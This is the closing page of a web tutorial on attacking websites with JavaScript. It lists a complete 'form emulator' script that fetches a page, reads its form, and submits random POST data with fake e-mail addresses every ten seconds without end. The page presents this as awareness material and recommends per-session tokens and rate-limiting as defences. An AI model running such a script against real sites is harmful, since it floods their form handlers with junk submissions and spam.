Programmatic POST Requests with JavaScript: Form Emulator in Action - The complete form emulator script: listing the full source code
To finish this tutorial, here is the full code for the form emulator script, including some basic (X)HTML markup and CSS declarations:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd">
<html>
<head>
<title>Post Http Requests with JavaScript</title>
<script type="text/javascript">
/**
 * Build the request object used by sendRequest().
 *
 * Uses the native XMLHttpRequest when the browser exposes one and falls
 * back to the 'Microsoft.XMLHTTP' ActiveX control (legacy Internet
 * Explorer) otherwise. displayStatus is attached as the readystatechange
 * handler before the object is handed back.
 *
 * @returns {Object|undefined} the request object, or undefined when the
 *     constructor produced a falsy value.
 */
function getXMLHTTPObject() {
  var request;
  if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
  } else {
    request = new ActiveXObject('Microsoft.XMLHTTP');
  }
  if (!request) {
    return;
  }
  // every state change of this request is reported to displayStatus
  request.onreadystatechange = displayStatus;
  return request;
}
// function sendRequest
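/**
 * Send one HTTP request through a fresh request object.
 *
 * Every falsy argument is replaced by its default. That includes '' for
 * `data` and `false` for `mode`: a caller that passes `false` still gets
 * an asynchronous request, because `!false` selects the default `true`.
 *
 * @param {string} [url='default_url.htm'] request target.
 * @param {string} [data='defaultdata=defaultvalue'] body handed to send().
 * @param {string} [method='post'] HTTP method handed to open().
 * @param {boolean} [mode=true] async flag handed to open().
 * @param {string} [header] one header written as "Name:value"; defaults to
 *     the form-urlencoded Content-Type.
 */
function sendRequest(url, data, method, mode, header) {
  if (!url) { url = 'default_url.htm'; }
  if (!data) { data = 'defaultdata=defaultvalue'; }
  if (!method) { method = 'post'; }
  if (!mode) { mode = true; }
  if (!header) {
    header = 'Content-Type:application/x-www-form-urlencoded; charset=UTF-8';
  }
  // Deliberately not declared with var: displayStatus() and getFormCode()
  // read the request through this shared global.
  objhttp = getXMLHTTPObject();
  if (!objhttp) {
    // getXMLHTTPObject() returns undefined when no request object exists
    return;
  }
  objhttp.open(method, url, mode);
  // Split at the first colon only, so a header value that itself contains
  // ':' is passed through whole instead of being cut at its first colon.
  var colon = header.indexOf(':');
  var headerName = colon < 0 ? header : header.substring(0, colon);
  var headerValue = colon < 0 ? '' : header.substring(colon + 1);
  objhttp.setRequestHeader(headerName, headerValue);
  objhttp.send(data);
}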
// function displayStatus
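/**
 * readystatechange handler for the request held in the global `objhttp`.
 *
 * Once the request is complete (readyState 4) it appends three <p>
 * elements to <body> showing the status code, the status text and the raw
 * response body, then calls getFormCode().
 *
 * The values are inserted with createTextNode, so any markup in the
 * response is shown as literal text and is not parsed by this function.
 */
function displayStatus() {
  // 4 means the request has finished; earlier states are ignored
  if (objhttp.readyState != 4) {
    return;
  }
  // [element id, text shown]
  var rows = [
    ['status', 'Status : ' + objhttp.status],
    ['text', 'Status text : ' + objhttp.statusText],
    ['response', 'Document code : ' + objhttp.responseText]
  ];
  // NOTE: each completed request appends three more <p> elements that
  // reuse the same ids, so the ids are not unique after the first response.
  for (var i = 0; i < rows.length; i++) {
    var par = document.createElement('p');
    par.id = rows[i][0];
    par.appendChild(document.createTextNode(rows[i][1]));
    document.body.appendChild(par);
  }
  // copy the form markup of this response into the page
  getFormCode();
}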
// function getFormCode
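/**
 * Copy the first form's markup out of the last response (the global
 * `objhttp`.responseText) into a hidden <div> appended to <body>, so that
 * getFormVariables() and getFormAction() can read it through the DOM.
 *
 * The copied slice runs from the opening "<form" up to, but not
 * including, the following "</form>". If either tag is missing nothing is
 * inserted; without that check a missing closing tag made substring()
 * swap its arguments and insert everything that precedes the form.
 */
function getFormCode() {
  var fdiv = document.createElement('div');
  document.body.appendChild(fdiv);
  var html = objhttp.responseText;
  var start = html.search(/<form\b/);
  // look for the closing tag only after the opening one
  var end = start < 0 ? -1 : html.indexOf('</form>', start);
  if (end >= 0) {
    // SECURITY: innerHTML parses fetched markup into this live document.
    // <script> elements inserted this way do not run, but inline event
    // handler attributes in the markup can, with this page's privileges.
    // Only use this with responses you trust.
    fdiv.innerHTML = html.substring(start, end);
  }
  // keep the copied form out of the rendered page
  fdiv.style.display = 'none';
}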
// function getFormVariables
/**
 * Build a "name=value&name=value" body for the first form in the document.
 *
 * Walks the direct child nodes of that form and, for every node whose
 * nodeName matches INPUT, TEXTAREA or SELECT, emits its name attribute
 * with a generated value: getRandomEmail() when the name contains "mail",
 * getRandomValue() otherwise. The values the form itself carries are
 * never read.
 *
 * @returns {string} the joined pairs, or '' when no field matched.
 */
function getFormVariables() {
  var fieldPattern = /(INPUT|TEXTAREA|SELECT)/;
  var nodes = document.getElementsByTagName('form')[0].childNodes;
  var pairs = [];
  var index = 0;
  while (index < nodes.length) {
    var node = nodes[index];
    index++;
    if (!fieldPattern.test(node.nodeName)) {
      continue;
    }
    var fieldName = node.getAttribute('name');
    // the test is for the substring "mail", not the whole word "email"
    var fieldValue = /mail/.test(fieldName) ? getRandomEmail() : getRandomValue();
    pairs.push(fieldName + '=' + fieldValue);
  }
  return pairs.join('&');
}
// function getFormAction
/**
 * Read the action attribute of the first form in the document.
 *
 * @returns {string|undefined} the attribute value, or undefined when it is
 *     missing or empty.
 */
function getFormAction() {
  var firstForm = document.getElementsByTagName('form')[0];
  var target = firstForm.getAttribute('action');
  // empty and missing attributes are both reported as undefined
  return target ? target : undefined;
}
// function getRandomValue
/**
 * Produce a short random token of lowercase letters and digits.
 *
 * The length is drawn first and lies between 2 and 9 characters; each
 * character is then drawn independently from the alphabet below (which
 * has no 'j'). Math.random() is not a cryptographic source.
 *
 * @returns {string} the generated token.
 */
function getRandomValue() {
  var alphabet = 'abcdefghiklmnopqrstuvwxyz0123456789';
  var remaining = Math.floor(Math.random() * 8) + 2;
  var picked = [];
  while (remaining > 0) {
    var position = Math.floor(Math.random() * alphabet.length);
    picked.push(alphabet.charAt(position));
    remaining--;
  }
  return picked.join('');
}
// function getRandomEmail
/**
 * Produce an address of the form johndoe<token>@<token>.com, with both
 * tokens taken from getRandomValue().
 *
 * The literal 'johndoe' prefix and '.com' suffix are the same on every
 * call, which makes submissions generated this way easy to recognise in
 * server logs.
 *
 * @returns {string} the generated address.
 */
function getRandomEmail() {
  var localPart = 'johndoe' + getRandomValue();
  var domain = getRandomValue() + '.com';
  return localPart + '@' + domain;
}
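/**
 * Page entry point: fetch 'post_form.htm' once, then submit a generated
 * POST to that form's action every 10 seconds. The timer is never cleared.
 *
 * Seen from the server this is a fixed-interval stream of submissions from
 * one client. Validating a per-session form token and rate-limiting
 * submissions per client are the usual server-side controls against it.
 */
window.onload = function () {
  // run only where the DOM methods used by the other functions exist
  if (document.getElementsByTagName && document.createElement) {
    // The `false` asks for a synchronous request, but sendRequest()
    // replaces falsy `mode` values with true, so this GET is asynchronous.
    sendRequest('post_form.htm', '', 'get', false);
    // A function is passed instead of a code string: the string form of
    // setInterval is evaluated like eval() and is refused by a
    // Content-Security-Policy that lacks 'unsafe-eval'.
    setInterval(function () {
      sendRequest(getFormAction(), getFormVariables(), 'post', true);
    }, 10 * 1000);
  }
};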
</script>
<style type="text/css">
h1 {
font: bold 12px Arial, Helvetica, sans-serif;
color: #000;
}
p {
font: normal 11px Arial, Helvetica, sans-serif;
color: #00f;
}
</style>
</head>
<body>
<h1>Emulating POST form submissions with JavaScript...</h1>
</body>
</html>
In the code above, the script is set to run once the page has finished loading, and a couple of CSS styles control the visual presentation of the information. Quite simple, isn’t it?
Conclusion
Over this series, I’ve offered wide-ranging coverage of real implementations of JavaScript-based HTTP requests, which are increasingly used as a means of attacking websites. The tutorials covered the basics of client-side denial of service attacks, as well as form emulation techniques.
Of course, due to the inherently insecure nature of the Internet, and specifically the Web, new attack techniques are continuously emerging, so the methods described above are only a small part of a much larger picture. Now that you’ve been warned, go and build more robust and safer Web programs. For a form handler, that means validating a per-session token on every submission and rate-limiting submissions per client.